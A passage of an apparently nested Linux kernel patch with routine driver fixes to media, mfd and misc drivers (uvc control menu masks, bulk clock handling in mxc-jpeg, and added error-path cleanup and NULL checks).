+-	if (IS_ERR(jpeg->clk_per)) {
+-		dev_err(dev, "failed to get clock: per\n");
+-		ret = PTR_ERR(jpeg->clk_per);
++	ret = devm_clk_bulk_get_all(&pdev->dev, &jpeg->clks);
++	if (ret < 0) {
++		dev_err(dev, "failed to get clock\n");
+ 		goto err_clk;
+ 	}
++	jpeg->num_clks = ret;
+ 
+ 	ret = mxc_jpeg_attach_pm_domains(jpeg);
+ 	if (ret < 0) {
+@@ -2581,32 +2574,20 @@ static int mxc_jpeg_runtime_resume(struct device *dev)
+ 	struct mxc_jpeg_dev *jpeg = dev_get_drvdata(dev);
+ 	int ret;
+ 
+-	ret = clk_prepare_enable(jpeg->clk_ipg);
+-	if (ret < 0) {
+-		dev_err(dev, "failed to enable clock: ipg\n");
+-		goto err_ipg;
+-	}
+-
+-	ret = clk_prepare_enable(jpeg->clk_per);
++	ret = clk_bulk_prepare_enable(jpeg->num_clks, jpeg->clks);
+ 	if (ret < 0) {
+-		dev_err(dev, "failed to enable clock: per\n");
+-		goto err_per;
++		dev_err(dev, "failed to enable clock\n");
++		return ret;
+ 	}
+ 
+ 	return 0;
+-
+-err_per:
+-	clk_disable_unprepare(jpeg->clk_ipg);
+-err_ipg:
+-	return ret;
+ }
+ 
+ static int mxc_jpeg_runtime_suspend(struct device *dev)
+ {
+ 	struct mxc_jpeg_dev *jpeg = dev_get_drvdata(dev);
+ 
+-	clk_disable_unprepare(jpeg->clk_ipg);
+-	clk_disable_unprepare(jpeg->clk_per);
++	clk_bulk_disable_unprepare(jpeg->num_clks, jpeg->clks);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.h b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.h
+index 8fa8c0aec5a2d..87157db780826 100644
+--- a/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.h
++++ b/drivers/media/platform/nxp/imx-jpeg/mxc-jpeg.h
+@@ -120,8 +120,8 @@ struct mxc_jpeg_dev {
+ 	spinlock_t			hw_lock; /* hardware access lock */
+ 	unsigned int			mode;
+ 	struct mutex			lock; /* v4l2 ioctls serialization */
+-	struct clk			*clk_ipg;
+-	struct clk			*clk_per;
++	struct clk_bulk_data		*clks;
++	int				num_clks;
+ 	struct platform_device		*pdev;
+ 	struct device			*dev;
+ 	void __iomem			*base_reg;
+diff --git a/drivers/media/platform/nxp/imx7-media-csi.c b/drivers/media/platform/nxp/imx7-media-csi.c
+index 886374d3a6ff1..1ef92c8c0098c 100644
+--- a/drivers/media/platform/nxp/imx7-media-csi.c
++++ b/drivers/media/platform/nxp/imx7-media-csi.c
+@@ -638,8 +638,10 @@ static int imx7_csi_init(struct imx7_csi *csi)
+ 	imx7_csi_configure(csi);
+ 
+ 	ret = imx7_csi_dma_setup(csi);
+-	if (ret < 0)
++	if (ret < 0) {
++		clk_disable_unprepare(csi->mclk);
+ 		return ret;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c b/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
+index 451a4c9b3d30d..04baa80494c66 100644
+--- a/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
++++ b/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
+@@ -429,7 +429,8 @@ static void csiphy_gen2_config_lanes(struct csiphy_device *csiphy,
+ 		array_size = ARRAY_SIZE(lane_regs_sm8250[0]);
+ 		break;
+ 	default:
+-		unreachable();
++		WARN(1, "unknown cspi version\n");
++		return;
+ 	}
+ 
+ 	for (l = 0; l < 5; l++) {
+diff --git a/drivers/media/platform/ti/cal/cal.c b/drivers/media/platform/ti/cal/cal.c
+index 56b61c0583cf8..1236215ec70eb 100644
+--- a/drivers/media/platform/ti/cal/cal.c
++++ b/drivers/media/platform/ti/cal/cal.c
+@@ -1050,8 +1050,10 @@ static struct cal_ctx *cal_ctx_create(struct cal_dev *cal, int inst)
+ 	ctx->cport = inst;
+ 
+ 	ret = cal_ctx_v4l2_init(ctx);
+-	if (ret)
++	if (ret) {
++		kfree(ctx);
+ 		return NULL;
++	}
+ 
+ 	return ctx;
+ }
+diff --git a/drivers/media/platform/ti/omap3isp/isp.c b/drivers/media/platform/ti/omap3isp/isp.c
+index 1d40bb59ff814..e7327e38482de 100644
+--- a/drivers/media/platform/ti/omap3isp/isp.c
++++ b/drivers/media/platform/ti/omap3isp/isp.c
+@@ -2307,7 +2307,16 @@ static int isp_probe(struct platform_device *pdev)
+ 
+ 	/* Regulators */
+ 	isp->isp_csiphy1.vdd = devm_regulator_get(&pdev->dev, "vdd-csiphy1");
++	if (IS_ERR(isp->isp_csiphy1.vdd)) {
++		ret = PTR_ERR(isp->isp_csiphy1.vdd);
++		goto error;
++	}
++
+ 	isp->isp_csiphy2.vdd = devm_regulator_get(&pdev->dev, "vdd-csiphy2");
++	if (IS_ERR(isp->isp_csiphy2.vdd)) {
++		ret = PTR_ERR(isp->isp_csiphy2.vdd);
++		goto error;
++	}
+ 
+ 	/* Clocks
+ 	 *
+diff --git a/drivers/media/platform/verisilicon/hantro_v4l2.c b/drivers/media/platform/verisilicon/hantro_v4l2.c
+index 2c7a805289e7b..30e650edaea8a 100644
+--- a/drivers/media/platform/verisilicon/hantro_v4l2.c
++++ b/drivers/media/platform/verisilicon/hantro_v4l2.c
+@@ -161,8 +161,11 @@ static int vidioc_enum_framesizes(struct file *file, void *priv,
+ 	}
+ 
+ 	/* For non-coded formats check if postprocessing scaling is possible */
+-	if (fmt->codec_mode == HANTRO_MODE_NONE && hantro_needs_postproc(ctx, fmt)) {
+-		return hanto_postproc_enum_framesizes(ctx, fsize);
++	if (fmt->codec_mode == HANTRO_MODE_NONE) {
++		if (hantro_needs_postproc(ctx, fmt))
++			return hanto_postproc_enum_framesizes(ctx, fsize);
++		else
++			return -ENOTTY;
+ 	} else if (fsize->index != 0) {
+ 		vpu_debug(0, "invalid frame size index (expected 0, got %d)\n",
+ 			  fsize->index);
+diff --git a/drivers/media/rc/ene_ir.c b/drivers/media/rc/ene_ir.c
+index e09270916fbca..11ee21a7db8f0 100644
+--- a/drivers/media/rc/ene_ir.c
++++ b/drivers/media/rc/ene_ir.c
+@@ -1106,6 +1106,8 @@ static void ene_remove(struct pnp_dev *pnp_dev)
+ 	struct ene_device *dev = pnp_get_drvdata(pnp_dev);
+ 	unsigned long flags;
+ 
++	rc_unregister_device(dev->rdev);
++	del_timer_sync(&dev->tx_sim_timer);
+ 	spin_lock_irqsave(&dev->hw_lock, flags);
+ 	ene_rx_disable(dev);
+ 	ene_rx_restore_hw_buffer(dev);
+@@ -1113,7 +1115,6 @@ static void ene_remove(struct pnp_dev *pnp_dev)
+ 
+ 	free_irq(dev->irq, dev);
+ 	release_region(dev->hw_io, ENE_IO_SIZE);
+-	rc_unregister_device(dev->rdev);
+ 	kfree(dev);
+ }
+ 
+diff --git a/drivers/media/usb/siano/smsusb.c b/drivers/media/usb/siano/smsusb.c
+index fe9c7b3a950e8..6f443c542c6da 100644
+--- a/drivers/media/usb/siano/smsusb.c
++++ b/drivers/media/usb/siano/smsusb.c
+@@ -179,6 +179,7 @@ static void smsusb_stop_streaming(struct smsusb_device_t *dev)
+ 
+ 	for (i = 0; i < MAX_URBS; i++) {
+ 		usb_kill_urb(&dev->surbs[i].urb);
++		cancel_work_sync(&dev->surbs[i].wq);
+ 
+ 		if (dev->surbs[i].cb) {
+ 			smscore_putbuffer(dev->coredev, dev->surbs[i].cb);
+diff --git a/drivers/media/usb/uvc/uvc_ctrl.c b/drivers/media/usb/uvc/uvc_ctrl.c
+index c95a2229f4fa9..44b0cfb8ee1c7 100644
+--- a/drivers/media/usb/uvc/uvc_ctrl.c
++++ b/drivers/media/usb/uvc/uvc_ctrl.c
+@@ -6,6 +6,7 @@
+  *          Laurent Pinchart (laurent.pinchart@ideasonboard.com)
+  */
+ 
++#include <linux/bitops.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
+ #include <linux/module.h>
+@@ -525,7 +526,8 @@ static const struct uvc_control_mapping uvc_ctrl_mappings[] = {
+ 		.v4l2_type	= V4L2_CTRL_TYPE_MENU,
+ 		.data_type	= UVC_CTRL_DATA_TYPE_BITMASK,
+ 		.menu_info	= exposure_auto_controls,
+-		.menu_count	= ARRAY_SIZE(exposure_auto_controls),
++		.menu_mask	= GENMASK(V4L2_EXPOSURE_APERTURE_PRIORITY,
++					  V4L2_EXPOSURE_AUTO),
+ 		.slave_ids	= { V4L2_CID_EXPOSURE_ABSOLUTE, },
+ 	},
+ 	{
+@@ -721,32 +723,53 @@ static const struct uvc_control_mapping uvc_ctrl_mappings[] = {
+ 	},
+ };
+ 
+-static const struct uvc_control_mapping uvc_ctrl_mappings_uvc11[] = {
+-	{
+-		.id		= V4L2_CID_POWER_LINE_FREQUENCY,
+-		.entity		= UVC_GUID_UVC_PROCESSING,
+-		.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
+-		.size		= 2,
+-		.offset		= 0,
+-		.v4l2_type	= V4L2_CTRL_TYPE_MENU,
+-		.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
+-		.menu_info	= power_line_frequency_controls,
+-		.menu_count	= ARRAY_SIZE(power_line_frequency_controls) - 1,
+-	},
++const struct uvc_control_mapping uvc_ctrl_power_line_mapping_limited = {
++	.id		= V4L2_CID_POWER_LINE_FREQUENCY,
++	.entity		= UVC_GUID_UVC_PROCESSING,
++	.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
++	.size		= 2,
++	.offset		= 0,
++	.v4l2_type	= V4L2_CTRL_TYPE_MENU,
++	.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
++	.menu_info	= power_line_frequency_controls,
++	.menu_mask	= GENMASK(V4L2_CID_POWER_LINE_FREQUENCY_60HZ,
++				  V4L2_CID_POWER_LINE_FREQUENCY_50HZ),
+ };
+ 
+-static const struct uvc_control_mapping uvc_ctrl_mappings_uvc15[] = {
+-	{
+-		.id		= V4L2_CID_POWER_LINE_FREQUENCY,
+-		.entity		= UVC_GUID_UVC_PROCESSING,
+-		.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
+-		.size		= 2,
+-		.offset		= 0,
+-		.v4l2_type	= V4L2_CTRL_TYPE_MENU,
+-		.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
+-		.menu_info	= power_line_frequency_controls,
+-		.menu_count	= ARRAY_SIZE(power_line_frequency_controls),
+-	},
++static const struct uvc_control_mapping uvc_ctrl_power_line_mapping_uvc11 = {
++	.id		= V4L2_CID_POWER_LINE_FREQUENCY,
++	.entity		= UVC_GUID_UVC_PROCESSING,
++	.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
++	.size		= 2,
++	.offset		= 0,
++	.v4l2_type	= V4L2_CTRL_TYPE_MENU,
++	.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
++	.menu_info	= power_line_frequency_controls,
++	.menu_mask	= GENMASK(V4L2_CID_POWER_LINE_FREQUENCY_60HZ,
++				  V4L2_CID_POWER_LINE_FREQUENCY_DISABLED),
++};
++
++static const struct uvc_control_mapping *uvc_ctrl_mappings_uvc11[] = {
++	&uvc_ctrl_power_line_mapping_uvc11,
++	NULL, /* Sentinel */
++};
++
++static const struct uvc_control_mapping uvc_ctrl_power_line_mapping_uvc15 = {
++	.id		= V4L2_CID_POWER_LINE_FREQUENCY,
++	.entity		= UVC_GUID_UVC_PROCESSING,
++	.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
++	.size		= 2,
++	.offset		= 0,
++	.v4l2_type	= V4L2_CTRL_TYPE_MENU,
++	.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
++	.menu_info	= power_line_frequency_controls,
++	.menu_mask	= GENMASK(V4L2_CID_POWER_LINE_FREQUENCY_AUTO,
++				  V4L2_CID_POWER_LINE_FREQUENCY_DISABLED),
++};
++
++static const struct uvc_control_mapping *uvc_ctrl_mappings_uvc15[] = {
++	&uvc_ctrl_power_line_mapping_uvc15,
++	NULL, /* Sentinel */
+ };
+ 
+ /* ------------------------------------------------------------------------
+@@ -975,7 +998,9 @@ static s32 __uvc_ctrl_get_value(struct uvc_control_mapping *mapping,
+ 		const struct uvc_menu_info *menu = mapping->menu_info;
+ 		unsigned int i;
+ 
+-		for (i = 0; i < mapping->menu_count; ++i, ++menu) {
++		for (i = 0; BIT(i) <= mapping->menu_mask; ++i, ++menu) {
++			if (!test_bit(i, &mapping->menu_mask))
++				continue;
+ 			if (menu->value == value) {
+ 				value = i;
+ 				break;
+@@ -1085,11 +1110,28 @@ static int uvc_query_v4l2_class(struct uvc_video_chain *chain, u32 req_id,
+ 	return 0;
+ }
+ 
++/*
++ * Check if control @v4l2_id can be accessed by the given control @ioctl
++ * (VIDIOC_G_EXT_CTRLS, VIDIOC_TRY_EXT_CTRLS or VIDIOC_S_EXT_CTRLS).
++ *
++ * For set operations on slave controls, check if the master's value is set to
++ * manual, either in the others controls set in the same ioctl call, or from
++ * the master's current value. This catches VIDIOC_S_EXT_CTRLS calls that set
++ * both the master and slave control, such as for instance setting
++ * auto_exposure=1, exposure_time_absolute=251.
++ */
+ int uvc_ctrl_is_accessible(struct uvc_video_chain *chain, u32 v4l2_id,
+-			   bool read)
++			   const struct v4l2_ext_controls *ctrls,
++			   unsigned long ioctl)
+ {
++	struct uvc_control_mapping *master_map = NULL;
++	struct uvc_control *master_ctrl = NULL;
+ 	struct uvc_control_mapping *mapping;
+ 	struct uvc_control *ctrl;
++	bool read = ioctl == VIDIOC_G_EXT_CTRLS;
++	s32 val;
++	int ret;
++	int i;
+ 
+ 	if (__uvc_query_v4l2_class(chain, v4l2_id, 0) >= 0)
+ 		return -EACCES;
+@@ -1104,6 +1146,29 @@ int uvc_ctrl_is_accessible(struct uvc_video_chain *chain, u32 v4l2_id,
+ 	if (!(ctrl->info.flags & UVC_CTRL_FLAG_SET_CUR) && !read)
+ 		return -EACCES;
+ 
++	if (ioctl != VIDIOC_S_EXT_CTRLS || !mapping->master_id)
++		return 0;
++
++	/*
++	 * Iterate backwards in cases where the master control is accessed
++	 * multiple times in the same ioctl. We want the last value.
++	 */
++	for (i = ctrls->count - 1; i >= 0; i--) {
++		if (ctrls->controls[i].id == mapping->master_id)
++			return ctrls->controls[i].value ==
++					mapping->master_manual ? 0 : -EACCES;
++	}
++
++	__uvc_find_control(ctrl->entity, mapping->master_id, &master_map,
++			   &master_ctrl, 0);
++
++	if (!master_ctrl || !(master_ctrl->info.flags & UVC_CTRL_FLAG_GET_CUR))
++		return 0;
++
++	ret = __uvc_ctrl_get(chain, master_ctrl, master_map, &val);
++	if (ret >= 0 && val != mapping->master_manual)
++		return -EACCES;
++
+ 	return 0;
+ }
+ 
+@@ -1169,12 +1234,14 @@ static int __uvc_query_v4l2_ctrl(struct uvc_video_chain *chain,
+ 
+ 	switch (mapping->v4l2_type) {
+ 	case V4L2_CTRL_TYPE_MENU:
+-		v4l2_ctrl->minimum = 0;
+-		v4l2_ctrl->maximum = mapping->menu_count - 1;
++		v4l2_ctrl->minimum = ffs(mapping->menu_mask) - 1;
++		v4l2_ctrl->maximum = fls(mapping->menu_mask) - 1;
+ 		v4l2_ctrl->step = 1;
+ 
+ 		menu = mapping->menu_info;
+-		for (i = 0; i < mapping->menu_count; ++i, ++menu) {
++		for (i = 0; BIT(i) <= mapping->menu_mask; ++i, ++menu) {
++			if (!test_bit(i, &mapping->menu_mask))
++				continue;
+ 			if (menu->value == v4l2_ctrl->default_value) {
+ 				v4l2_ctrl->default_value = i;
+ 				break;
+@@ -1289,7 +1356,7 @@ int uvc_query_v4l2_menu(struct uvc_video_chain *chain,
+ 		goto done;
+ 	}
+ 
+-	if (query_menu->index >= mapping->menu_count) {
++	if (!test_bit(query_menu->index, &mapping->menu_mask)) {
+ 		ret = -EINVAL;
+ 		goto done;
+ 	}
+@@ -1797,8 +1864,13 @@ int uvc_ctrl_set(struct uvc_fh *handle,
+ 		break;
+ 
+ 	case V4L2_CTRL_TYPE_MENU:
+-		if (xctrl->value < 0 || xctrl->value >= mapping->menu_count)
++		if (xctrl->value < (ffs(mapping->menu_mask) - 1) ||
++		    xctrl->value > (fls(mapping->menu_mask) - 1))
+ 			return -ERANGE;
++
++		if (!test_bit(xctrl->value, &mapping->menu_mask))
++			return -EINVAL;
++
+ 		value = mapping->menu_info[xctrl->value].value;
+ 
+ 		/*
+@@ -2237,7 +2309,7 @@ static int __uvc_ctrl_add_mapping(struct uvc_video_chain *chain,
+ 
+ 	INIT_LIST_HEAD(&map->ev_subs);
+ 
+-	size = sizeof(*mapping->menu_info) * mapping->menu_count;
++	size = sizeof(*mapping->menu_info) * fls(mapping->menu_mask);
+ 	map->menu_info = kmemdup(mapping->menu_info, size, GFP_KERNEL);
+ 	if (map->menu_info == NULL) {
+ 		kfree(map->name);
+@@ -2421,8 +2493,7 @@ static void uvc_ctrl_prune_entity(struct uvc_device *dev,
+ static void uvc_ctrl_init_ctrl(struct uvc_video_chain *chain,
+ 			       struct uvc_control *ctrl)
+ {
+-	const struct uvc_control_mapping *mappings;
+-	unsigned int num_mappings;
++	const struct uvc_control_mapping **mappings;
+ 	unsigned int i;
+ 
+ 	/*
+@@ -2489,16 +2560,11 @@ static void uvc_ctrl_init_ctrl(struct uvc_video_chain *chain,
+ 	}
+ 
+ 	/* Finally process version-specific mappings. */
+-	if (chain->dev->uvc_version < 0x0150) {
+-		mappings = uvc_ctrl_mappings_uvc11;
+-		num_mappings = ARRAY_SIZE(uvc_ctrl_mappings_uvc11);
+-	} else {
+-		mappings = uvc_ctrl_mappings_uvc15;
+-		num_mappings = ARRAY_SIZE(uvc_ctrl_mappings_uvc15);
+-	}
++	mappings = chain->dev->uvc_version < 0x0150
++		 ? uvc_ctrl_mappings_uvc11 : uvc_ctrl_mappings_uvc15;
+ 
+-	for (i = 0; i < num_mappings; ++i) {
+-		const struct uvc_control_mapping *mapping = &mappings[i];
++	for (i = 0; mappings[i]; ++i) {
++		const struct uvc_control_mapping *mapping = mappings[i];
+ 
+ 		if (uvc_entity_match_guid(ctrl->entity, mapping->entity) &&
+ 		    ctrl->info.selector == mapping->selector)
+diff --git a/drivers/media/usb/uvc/uvc_driver.c b/drivers/media/usb/uvc/uvc_driver.c
+index e4bcb50113607..d5ff8df20f18a 100644
+--- a/drivers/media/usb/uvc/uvc_driver.c
++++ b/drivers/media/usb/uvc/uvc_driver.c
+@@ -7,6 +7,7 @@
+  */
+ 
+ #include <linux/atomic.h>
++#include <linux/bits.h>
+ #include <linux/gpio/consumer.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
+@@ -2370,23 +2371,6 @@ MODULE_PARM_DESC(timeout, "Streaming control requests timeout");
+  * Driver initialization and cleanup
+  */
+ 
+-static const struct uvc_menu_info power_line_frequency_controls_limited[] = {
+-	{ 1, "50 Hz" },
+-	{ 2, "60 Hz" },
+-};
+-
+-static const struct uvc_control_mapping uvc_ctrl_power_line_mapping_limited = {
+-	.id		= V4L2_CID_POWER_LINE_FREQUENCY,
+-	.entity		= UVC_GUID_UVC_PROCESSING,
+-	.selector	= UVC_PU_POWER_LINE_FREQUENCY_CONTROL,
+-	.size		= 2,
+-	.offset		= 0,
+-	.v4l2_type	= V4L2_CTRL_TYPE_MENU,
+-	.data_type	= UVC_CTRL_DATA_TYPE_ENUM,
+-	.menu_info	= power_line_frequency_controls_limited,
+-	.menu_count	= ARRAY_SIZE(power_line_frequency_controls_limited),
+-};
+-
+ static const struct uvc_device_info uvc_ctrl_power_line_limited = {
+ 	.mappings = (const struct uvc_control_mapping *[]) {
+ 		&uvc_ctrl_power_line_mapping_limited,
+diff --git a/drivers/media/usb/uvc/uvc_v4l2.c b/drivers/media/usb/uvc/uvc_v4l2.c
+index f4d4c33b6dfbd..0774a11360c03 100644
+--- a/drivers/media/usb/uvc/uvc_v4l2.c
++++ b/drivers/media/usb/uvc/uvc_v4l2.c
+@@ -6,6 +6,7 @@
+  *          Laurent Pinchart (laurent.pinchart@ideasonboard.com)
+  */
+ 
++#include <linux/bits.h>
+ #include <linux/compat.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
+@@ -80,7 +81,7 @@ static int uvc_ioctl_ctrl_map(struct uvc_video_chain *chain,
+ 			goto free_map;
+ 		}
+ 
+-		map->menu_count = xmap->menu_count;
++		map->menu_mask = GENMASK(xmap->menu_count - 1, 0);
+ 		break;
+ 
+ 	default:
+@@ -1020,8 +1021,7 @@ static int uvc_ctrl_check_access(struct uvc_video_chain *chain,
+ 	int ret = 0;
+ 
+ 	for (i = 0; i < ctrls->count; ++ctrl, ++i) {
+-		ret = uvc_ctrl_is_accessible(chain, ctrl->id,
+-					    ioctl == VIDIOC_G_EXT_CTRLS);
++		ret = uvc_ctrl_is_accessible(chain, ctrl->id, ctrls, ioctl);
+ 		if (ret)
+ 			break;
+ 	}
+diff --git a/drivers/media/usb/uvc/uvcvideo.h b/drivers/media/usb/uvc/uvcvideo.h
+index df93db259312e..1227ae63f85b7 100644
+--- a/drivers/media/usb/uvc/uvcvideo.h
++++ b/drivers/media/usb/uvc/uvcvideo.h
+@@ -117,7 +117,7 @@ struct uvc_control_mapping {
+ 	u32 data_type;
+ 
+ 	const struct uvc_menu_info *menu_info;
+-	u32 menu_count;
++	unsigned long menu_mask;
+ 
+ 	u32 master_id;
+ 	s32 master_manual;
+@@ -728,6 +728,7 @@ int uvc_status_start(struct uvc_device *dev, gfp_t flags);
+ void uvc_status_stop(struct uvc_device *dev);
+ 
+ /* Controls */
++extern const struct uvc_control_mapping uvc_ctrl_power_line_mapping_limited;
+ extern const struct v4l2_subscribed_event_ops uvc_ctrl_sub_ev_ops;
+ 
+ int uvc_query_v4l2_ctrl(struct uvc_video_chain *chain,
+@@ -761,7 +762,8 @@ static inline int uvc_ctrl_rollback(struct uvc_fh *handle)
+ int uvc_ctrl_get(struct uvc_video_chain *chain, struct v4l2_ext_control *xctrl);
+ int uvc_ctrl_set(struct uvc_fh *handle, struct v4l2_ext_control *xctrl);
+ int uvc_ctrl_is_accessible(struct uvc_video_chain *chain, u32 v4l2_id,
+-			   bool read);
++			   const struct v4l2_ext_controls *ctrls,
++			   unsigned long ioctl);
+ 
+ int uvc_xu_ctrl_query(struct uvc_video_chain *chain,
+ 		      struct uvc_xu_control_query *xqry);
+diff --git a/drivers/media/v4l2-core/v4l2-h264.c b/drivers/media/v4l2-core/v4l2-h264.c
+index 72bd64f651981..c00197d095e75 100644
+--- a/drivers/media/v4l2-core/v4l2-h264.c
++++ b/drivers/media/v4l2-core/v4l2-h264.c
+@@ -305,6 +305,8 @@ static const char *format_ref_list_p(const struct v4l2_h264_reflist_builder *bui
+ 	int n = 0, i;
+ 
+ 	*out_str = kmalloc(tmp_str_size, GFP_KERNEL);
++	if (!(*out_str))
++		return NULL;
+ 
+ 	n += snprintf(*out_str + n, tmp_str_size - n, "|");
+ 
+@@ -343,6 +345,8 @@ static const char *format_ref_list_b(const struct v4l2_h264_reflist_builder *bui
+ 	int n = 0, i;
+ 
+ 	*out_str = kmalloc(tmp_str_size, GFP_KERNEL);
++	if (!(*out_str))
++		return NULL;
+ 
+ 	n += snprintf(*out_str + n, tmp_str_size - n, "|");
+ 
+diff --git a/drivers/media/v4l2-core/v4l2-jpeg.c b/drivers/media/v4l2-core/v4l2-jpeg.c
+index c2513b775f6a7..94435a7b68169 100644
+--- a/drivers/media/v4l2-core/v4l2-jpeg.c
++++ b/drivers/media/v4l2-core/v4l2-jpeg.c
+@@ -460,7 +460,7 @@ static int jpeg_parse_app14_data(struct jpeg_stream *stream,
+ 	/* Check for "Adobe\0" in Ap1..6 */
+ 	if (stream->curr + 6 > stream->end ||
+ 	    strncmp(stream->curr, "Adobe\0", 6))
+-		return -EINVAL;
++		return jpeg_skip(stream, lp - 2);
+ 
+ 	/* get to Ap12 */
+ 	ret = jpeg_skip(stream, 11);
+@@ -474,7 +474,7 @@ static int jpeg_parse_app14_data(struct jpeg_stream *stream,
+ 	*tf = ret;
+ 
+ 	/* skip the rest of the segment, this ensures at least it is complete */
+-	skip = lp - 2 - 11;
++	skip = lp - 2 - 11 - 1;
+ 	return jpeg_skip(stream, skip);
+ }
+ 
+diff --git a/drivers/mfd/Kconfig b/drivers/mfd/Kconfig
+index 30db49f318668..7ed31fbd8c7fa 100644
+--- a/drivers/mfd/Kconfig
++++ b/drivers/mfd/Kconfig
+@@ -15,6 +15,7 @@ config MFD_CS5535
+ 	tristate "AMD CS5535 and CS5536 southbridge core functions"
+ 	select MFD_CORE
+ 	depends on PCI && (X86_32 || (X86 && COMPILE_TEST))
++	depends on !UML
+ 	help
+ 	  This is the core driver for CS5535/CS5536 MFD functions.  This is
+ 	  necessary for using the board's GPIO and MFGPT functionality.
+diff --git a/drivers/mfd/pcf50633-adc.c b/drivers/mfd/pcf50633-adc.c
+index 5cd653e615125..191b1bc6141c2 100644
+--- a/drivers/mfd/pcf50633-adc.c
++++ b/drivers/mfd/pcf50633-adc.c
+@@ -136,6 +136,7 @@ int pcf50633_adc_async_read(struct pcf50633 *pcf, int mux, int avg,
+ 			     void *callback_param)
+ {
+ 	struct pcf50633_adc_request *req;
++	int ret;
+ 
+ 	/* req is freed when the result is ready, in interrupt handler */
+ 	req = kmalloc(sizeof(*req), GFP_KERNEL);
+@@ -147,7 +148,11 @@ int pcf50633_adc_async_read(struct pcf50633 *pcf, int mux, int avg,
+ 	req->callback = callback;
+ 	req->callback_param = callback_param;
+ 
+-	return adc_enqueue_request(pcf, req);
++	ret = adc_enqueue_request(pcf, req);
++	if (ret)
++		kfree(req);
++
++	return ret;
+ }
+ EXPORT_SYMBOL_GPL(pcf50633_adc_async_read);
+ 
+diff --git a/drivers/mfd/rk808.c b/drivers/mfd/rk808.c
+index f44fc3f080a8e..0f22ef61e8170 100644
+--- a/drivers/mfd/rk808.c
++++ b/drivers/mfd/rk808.c
+@@ -189,6 +189,7 @@ static const struct mfd_cell rk817s[] = {
+ };
+ 
+ static const struct mfd_cell rk818s[] = {
++	{ .name = "rk808-clkout", .id = PLATFORM_DEVID_NONE, },
+ 	{ .name = "rk808-regulator", .id = PLATFORM_DEVID_NONE, },
+ 	{
+ 		.name = "rk808-rtc",
+diff --git a/drivers/misc/eeprom/idt_89hpesx.c b/drivers/misc/eeprom/idt_89hpesx.c
+index 4e07ee9cb500e..7075d0b378811 100644
+--- a/drivers/misc/eeprom/idt_89hpesx.c
++++ b/drivers/misc/eeprom/idt_89hpesx.c
+@@ -1566,12 +1566,20 @@ static struct i2c_driver idt_driver = {
+  */
+ static int __init idt_init(void)
+ {
++	int ret;
++
+ 	/* Create Debugfs directory first */
+ 	if (debugfs_initialized())
+ 		csr_dbgdir = debugfs_create_dir("idt_csr", NULL);
+ 
+ 	/* Add new i2c-device driver */
+-	return i2c_add_driver(&idt_driver);
++	ret = i2c_add_driver(&idt_driver);
++	if (ret) {
++		debugfs_remove_recursive(csr_dbgdir);
++		return ret;
++	}
++
++	return 0;
+ }
+ module_init(idt_init);
+ 
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index 5310606113fe5..7ccaca1b7cb8b 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -2315,7 +2315,18 @@ static int fastrpc_rpmsg_probe(struct rpmsg_device *rpdev)
+ 	data->domain_id = domain_id;
+ 	data->rpdev = rpdev;
+ 
+-	return of_platform_populate(rdev->of_node, NULL, NULL, rdev);
++	err = of_platform_populate(rdev->of_node, NULL, NULL, rdev);
++	if (err)
++		goto populate_error;
++
++	return 0;
++
++populate_error:
++	if (data->fdevice)
++		misc_deregister(&data->fdevice->miscdev);
++	if (data->secure_fdevice)
++		misc_deregister(&data->secure_fdevice->miscdev);
++
+ fdev_error:
+ 	kfree(data);
+ 	return err;
+diff --git a/drivers/misc/habanalabs/common/command_submission.c b/drivers/misc/habanalabs/common/command_submission.c
+index ea0e5101c10ed..6367cbea4ca2a 100644
+--- a/drivers/misc/habanalabs/common/command_submission.c
++++ b/drivers/misc/habanalabs/common/command_submission.c
+@@ -3119,19 +3119,18 @@ start_over:
+ 			goto start_over;
+ 		}
+ 	} else {
++		/* Fill up the new registration node info */
++		requested_offset_record->ts_reg_info.buf = buf;
++		requested_offset_record->ts_reg_info.cq_cb = cq_cb;
++		requested_offset_record->ts_reg_info.timestamp_kernel_addr =
++				(u64 *) ts_buff->user_buff_address + ts_offset;
++		requested_offset_record->cq_kernel_addr =
++				(u64 *) cq_cb->kernel_address + cq_offset;
++		requested_offset_record->cq_target_value = target_value;
++
+ 		spin_unlock_irqrestore(wait_list_lock, flags);
+ 	}
+ 
+-	/* Fill up the new registration node info */
+-	requested_offset_record->ts_reg_info.in_use = 1;
+-	requested_offset_record->ts_reg_info.buf = buf;
+-	requested_offset_record->ts_reg_info.cq_cb = cq_cb;
+-	requested_offset_record->ts_reg_info.timestamp_kernel_addr =
+-			(u64 *) ts_buff->user_buff_address + ts_offset;
+-	requested_offset_record->cq_kernel_addr =
+-			(u64 *) cq_cb->kernel_address + cq_offset;
+-	requested_offset_record->cq_target_value = target_value;
+-
+ 	*pend = requested_offset_record;
+ 
+ 	dev_dbg(buf->mmg->dev, "Found available node in TS kernel CB %p\n",
+@@ -3179,7 +3178,7 @@ static int _hl_interrupt_wait_ioctl(struct hl_device *hdev, struct hl_ctx *ctx,
+ 			goto put_cq_cb;
+ 		}
+ 
+-		/* Find first available record */
++		/* get ts buffer record */
+ 		rc = ts_buff_get_kernel_ts_record(buf, cq_cb, ts_offset,
+ 						cq_counters_offset, target_value,
